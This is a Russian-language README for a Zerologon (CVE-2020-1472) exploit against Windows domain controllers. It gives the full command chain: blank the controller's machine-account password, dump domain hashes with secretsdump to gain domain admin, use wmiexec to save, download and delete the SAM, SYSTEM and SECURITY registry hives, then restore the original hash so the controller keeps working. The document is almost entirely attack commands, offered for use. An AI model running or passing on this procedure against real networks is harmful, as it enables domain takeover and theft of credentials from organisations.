
Эксплойт для zerologon cve-2020-1472
Код эксплойта основан на https://www.secura.com/blog/zero-logon и https://github.com/SecuraBV/CVE-2020-1472. Оригинальное исследование и сканер от Secura, модификации от RiskSense Inc.
Для эксплуатации удалите все предыдущие установки Impacket и установите Impacket из https://github.com/SecureAuthCorp/impacket/commit/b867b21 или новее. Затем выполните:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Если это успешно, вы затем сможете:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
что должно дать вам права администратора домена. После этого используйте wmiexec.py для доступа к целевому контроллеру домена с учетными данными из secretsdump и выполните
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
Затем вы можете
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
И это должно показать вам исходный NT-хеш учетной записи компьютера. Затем вы можете восстановить этот исходный хеш учетной записи компьютера в домене с помощью
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Восстановление исходного хеша необходимо для нормальной работы контроллера домена.